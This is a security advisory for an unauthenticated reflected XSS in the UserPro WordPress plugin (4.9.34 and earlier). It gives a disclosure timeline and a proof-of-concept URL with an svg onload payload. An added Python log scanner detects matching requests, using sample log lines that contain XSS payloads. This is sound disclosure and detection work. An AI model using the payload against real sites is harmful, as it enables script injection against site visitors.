
UserPro <= 4.9.34 - Unauthenticated Reflected XSS

Description

Edit (WPscanTeam):

August 26th, 2019 - Envato Notified

September 2nd, 2019 - v4.9.34 released, still vulnerable

September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue

Proof of Concept

/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(/XSS/)%3E 
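
To check whether a site received requests shaped like the proof of concept above, its access logs can be scanned for that path with markup in the two query parameters. This is an added example, not part of the original advisory or the plugin's code. The combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path taken from the proof of concept on this page.
VULN_SUFFIX = "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"
# Parameters that appear in the proof-of-concept URL.
PARAMS = {"error", "error_description"}
# Markup indicators: a tag opener, an inline event handler, or a javascript: URI.
MARKUP = re.compile(r"<\s*[a-z!/]|\bon[a-z]+\s*=|javascript:", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return the names of PoC parameters carrying markup in a request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_SUFFIX):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if name in PARAMS and (MARKUP.search(value) or MARKUP.search(decoded)):
            hits.append(name)
    return hits

def scan(lines):
    """Yield (line_number, parameter_names) for log lines worth reviewing."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Oct/2019:10:00:00 +0000] "GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(/XSS/)%3E HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.6 - - [01/Oct/2019:10:01:00 +0000] "GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=access_denied&error_description=The+user+denied+your+request HTTP/1.1" 200 498 "-" "-"',
    '203.0.113.7 - - [01/Oct/2019:10:02:00 +0000] "GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error_description=%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 505 "-" "-"',
    '203.0.113.8 - - [01/Oct/2019:10:03:00 +0000] "GET /index.php?error_description=%3Cb%3E HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(hits)}")
```

A hit shows only that such a request was made; whether the response reflected the value depends on the plugin version installed at the time.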